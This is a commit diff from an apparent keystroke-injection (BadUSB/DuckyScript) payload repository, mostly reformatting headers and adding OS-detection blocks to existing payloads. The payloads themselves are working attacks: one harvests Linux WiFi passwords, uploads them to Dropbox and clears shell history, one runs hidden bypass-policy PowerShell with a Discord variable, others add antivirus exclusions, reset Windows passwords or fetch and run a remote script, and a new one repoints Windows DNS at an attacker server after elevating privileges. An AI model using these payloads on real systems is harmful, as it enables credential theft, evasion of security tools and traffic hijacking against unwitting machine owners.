Compare commits
24 Commits
862ad0397a
...
a0ebf8224c
Author | SHA1 | Date |
---|---|---|
Aleff | a0ebf8224c | |
Peaks | f3053273a4 | |
Peaks | d5e02033fe | |
bst04 | b2b8cf8b2e | |
Peaks | 3333420b26 | |
bst04 | 8cd44e511c | |
bst04 | bad6fb6040 | |
bst04 | 9c3f29df37 | |
Luu | 3604620ab9 | |
Luu | 261e82a829 | |
Peaks | 5f13d6090f | |
Luu | 1a1c79d5ba | |
Luu | 203d986ae4 | |
Peaks | 6ae414c545 | |
Luu | aeffdbfcbd | |
Luu | 9a5857b2af | |
Luu | aa5afab7ed | |
Luu | f6fb02fe34 | |
Luu | 0bb2f83a10 | |
Luu | 4a6e17773d | |
Luu | 81ae8f0e8c | |
Luu | 554b3066b7 | |
Aleff | 47fa68ecd9 | |
Alessandro Greco | 0f1e1af17c |
|
@ -1,27 +1,53 @@
|
||||||
|
|
||||||
REM #######################################################
|
REM_BLOCK
|
||||||
REM # |
|
#######################################################
|
||||||
REM # Title : Exfiltrate Wifi Passwords - Linux |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Exfiltrate Wifi Passwords - Linux #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Exfiltration, Credentials, Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Linux |
|
# Category : Exfiltration, Credentials, Execution #
|
||||||
REM # |
|
# Target : Linux #
|
||||||
REM #######################################################
|
# #
|
||||||
|
#######################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Permissions
|
REM - Permissions
|
||||||
REM - Internet connection
|
REM - Internet connection
|
||||||
REM - Dropbox Token
|
REM - Dropbox Token
|
||||||
|
|
||||||
DELAY 1000
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM #### PREREQUISITES SECTION ####
|
REM #### PREREQUISITES SECTION ####
|
||||||
|
|
||||||
|
|
||||||
REM Required: You need to know the sudo password and replace 'example' with this
|
REM Required: You need to know the sudo password and replace 'example' with this
|
||||||
DEFINE SUDO_PASS example
|
DEFINE SUDO_PASS example
|
||||||
STRING sudo su
|
STRING sudo su
|
||||||
|
@ -41,8 +67,6 @@ ENTER
|
||||||
|
|
||||||
|
|
||||||
REM #### ZIP SECTION ####
|
REM #### ZIP SECTION ####
|
||||||
|
|
||||||
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
|
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
|
||||||
ENTER
|
ENTER
|
||||||
|
@ -61,8 +85,6 @@ ENTER
|
||||||
|
|
||||||
|
|
||||||
REM #### WiFi && ZIP SECTION ####
|
REM #### WiFi && ZIP SECTION ####
|
||||||
|
|
||||||
|
|
||||||
REM Get all WiFi data
|
REM Get all WiFi data
|
||||||
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
|
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
|
||||||
ENTER
|
ENTER
|
||||||
|
@ -85,8 +107,6 @@ DELAY 3000
|
||||||
|
|
||||||
|
|
||||||
REM #### EXFILTRATE SECTION ####
|
REM #### EXFILTRATE SECTION ####
|
||||||
|
|
||||||
|
|
||||||
REM Set yout Dropbox folder name
|
REM Set yout Dropbox folder name
|
||||||
DEFINE DROPBOX_FOLDER_NAME example
|
DEFINE DROPBOX_FOLDER_NAME example
|
||||||
STRING DROPBOX_FOLDER="/
|
STRING DROPBOX_FOLDER="/
|
||||||
|
@ -105,8 +125,6 @@ ENTER
|
||||||
|
|
||||||
|
|
||||||
REM #### REMOVE TRACES ####
|
REM #### REMOVE TRACES ####
|
||||||
|
|
||||||
|
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
STRING history -c
|
STRING history -c
|
||||||
ENTER
|
ENTER
|
||||||
|
|
|
@ -10,8 +10,49 @@ REM # |
|
||||||
REM ###################################################################
|
REM ###################################################################
|
||||||
|
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
DELAY 2000
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 250
|
DELAY 250
|
||||||
STRING powershell -w h -ep bypass $discord='
|
STRING powershell -w h -ep bypass $discord='
|
||||||
|
|
|
@ -1,24 +1,65 @@
|
||||||
REM ########################################################
|
REM_BLOCK
|
||||||
REM # |
|
########################################################
|
||||||
REM # Title : Add An Exception To Avast Antivirus |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Add An Exception To Avast Antivirus #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10/11 #
|
||||||
REM ########################################################
|
# #
|
||||||
|
########################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Avast installed and configured
|
REM - Avast installed and configured
|
||||||
|
|
||||||
|
|
||||||
REM Set the full-path that you want to set as exception
|
REM Set the full-path that you want to set as exception
|
||||||
DEFINE FULL-PATH example/to/path
|
DEFINE FULL-PATH example/to/path
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
REM Open Avast application
|
REM Open Avast application
|
||||||
DELAY 2000
|
|
||||||
GUI
|
GUI
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING avast
|
STRING avast
|
||||||
|
|
|
@ -1,13 +1,14 @@
|
||||||
REM ##############################################
|
REM_BLOCK
|
||||||
REM # |
|
##############################################
|
||||||
REM # Title : Call Someone On An iPhone |
|
# |
|
||||||
REM # Author : Aleff |
|
# Title : Call Someone On An iPhone |
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff |
|
||||||
REM # Category : Execution |
|
# Version : 1.0 |
|
||||||
REM # Target : iPhone |
|
# Category : Execution |
|
||||||
REM # |
|
# Target : iPhone |
|
||||||
REM ##############################################
|
# |
|
||||||
|
##############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - The phone must be unlocked
|
REM - The phone must be unlocked
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
REM ###########################################
|
REM_BLOCK
|
||||||
REM # |
|
###########################################
|
||||||
REM # Title : Change Remote Git Link |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Change Remote Git Link #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11/Linux |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10-11/Linux #
|
||||||
REM ###########################################
|
# #
|
||||||
|
###########################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet Connection
|
REM - Internet Connection
|
||||||
|
|
|
@ -1,25 +1,50 @@
|
||||||
|
REM_BLOCK
|
||||||
REM ###########################################
|
###########################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Change Linux MAC Address |
|
# Title : Change Linux MAC Address #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
REM # Category : Execution |
|
# Category : Execution #
|
||||||
REM # Target : Linux |
|
# Target : Linux #
|
||||||
REM # |
|
# #
|
||||||
REM ###########################################
|
###########################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Permissions
|
REM - Permissions
|
||||||
|
|
||||||
DELAY 1000
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM #### PERMISSIONS SECTION ####
|
REM #### PERMISSIONS SECTION ####
|
||||||
|
|
||||||
|
|
||||||
REM You need to know the sudo password and replace 'example' with this
|
REM You need to know the sudo password and replace 'example' with this
|
||||||
DEFINE SUDO_PASS example
|
DEFINE SUDO_PASS example
|
||||||
|
|
||||||
|
|
|
@ -1,25 +1,49 @@
|
||||||
|
REM_BLOCK
|
||||||
REM ###############################################
|
###############################################
|
||||||
REM # |
|
# #
|
||||||
REM # Title : Change Network Configuration |
|
# Title : Change Network Configuration #
|
||||||
REM # Author : Aleff |
|
# Author : Aleff #
|
||||||
REM # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
REM # Category : Execution |
|
# Category : Execution #
|
||||||
REM # Target : Linux |
|
# Target : Linux #
|
||||||
REM # |
|
# #
|
||||||
REM ###############################################
|
###############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Permissions
|
REM - Permissions
|
||||||
|
|
||||||
DELAY 1000
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
CTRL-ALT t
|
CTRL-ALT t
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
|
|
||||||
|
|
||||||
REM #### PERMISSIONS SECTION ####
|
REM #### PERMISSIONS SECTION ####
|
||||||
|
|
||||||
|
|
||||||
REM Required: You need to know the sudo password and replace 'example' with this
|
REM Required: You need to know the sudo password and replace 'example' with this
|
||||||
DEFINE SUDO_PASS example
|
DEFINE SUDO_PASS example
|
||||||
STRING sudo su
|
STRING sudo su
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
REM #############################################
|
REM_BLOCK
|
||||||
REM # |
|
#############################################
|
||||||
REM # Title : Change Windows User Name |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Change Windows User Name #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10/11 |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10/11 #
|
||||||
REM #############################################
|
# #
|
||||||
|
#############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Nothing
|
REM - Nothing
|
||||||
|
@ -17,8 +19,50 @@ REM - Payload tested on Windows 11 Eng
|
||||||
REM Set the new name that you want to set
|
REM Set the new name that you want to set
|
||||||
DEFINE NEW_NAME example
|
DEFINE NEW_NAME example
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
REM Open Windows research
|
REM Open Windows research
|
||||||
DELAY 2000
|
|
||||||
GUI
|
GUI
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
||||||
|
|
|
@ -1,12 +1,14 @@
|
||||||
REM ############################################################
|
REM_BLOCK
|
||||||
REM # |
|
############################################################
|
||||||
REM # Title : Change the password of the Windows user |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Change the password of the Windows user #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ############################################################
|
# #
|
||||||
|
############################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Nothing (i know it's absurd)
|
REM - Nothing (i know it's absurd)
|
||||||
|
@ -14,7 +16,49 @@ REM - Nothing (i know it's absurd)
|
||||||
REM You must define the new Windows user password
|
REM You must define the new Windows user password
|
||||||
DEFINE NEW_PASSWORD example
|
DEFINE NEW_PASSWORD example
|
||||||
|
|
||||||
DELAY 1000
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
GUI x
|
GUI x
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING a
|
STRING a
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
# Close All Applications - BADUSB ✅
|
# Close All Applications
|
||||||
|
|
||||||
A script used to close all target open applications.
|
A script used to close all target open applications.
|
||||||
|
|
||||||
|
|
|
@ -1,27 +1,69 @@
|
||||||
REM #####################################################
|
REM_BLOCK
|
||||||
REM # |
|
#####################################################
|
||||||
REM # Title : Close All Applications |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Close All Applications #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Execution |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Execution #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM #####################################################
|
# #
|
||||||
|
#####################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Plug-And-Play
|
REM Plug-And-Play
|
||||||
|
|
||||||
REM
|
|
||||||
REM 1. Open a powershell
|
REM 1. Open a powershell
|
||||||
REM 2. Download a Python script
|
REM 2. Download a Python script
|
||||||
REM 3. Execute it
|
REM 3. Execute it
|
||||||
REM 4. Remove Python script downloaded
|
REM 4. Remove Python script downloaded
|
||||||
REM 5. Delete powershell history
|
REM 5. Delete powershell history
|
||||||
REM
|
|
||||||
|
|
||||||
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
|
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
|
||||||
DEFINE POWERSHEL_CODE example.com
|
DEFINE POWERSHEL_CODE example.com
|
||||||
|
|
||||||
DELAY 2000
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
GUI x
|
GUI x
|
||||||
DELAY 250
|
DELAY 250
|
||||||
DOWNARROW
|
DOWNARROW
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
# Spoof DNS - Windows ✅
|
||||||
|
|
||||||
|
DNS Spoofer
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set the primary and secondary dns servers
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Luu176 </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/luu176">
|
||||||
|
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,69 @@
|
||||||
|
REM Title: DNS changer
|
||||||
|
REM Author: luu176
|
||||||
|
REM Description: Changes DNS address of windows machine in powershell
|
||||||
|
REM Target: Windows 10/11
|
||||||
|
|
||||||
|
REM wifi interface should be named: Wi-Fi
|
||||||
|
DEFINE #interface Ethernet
|
||||||
|
DEFINE #primaryDNS 192.168.1.3
|
||||||
|
DEFINE #secondaryDNS 1.1.1.1
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
GUI r
|
||||||
|
DELAY 150
|
||||||
|
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||||
|
DELAY 800
|
||||||
|
ALT y
|
||||||
|
DELAY 500
|
||||||
|
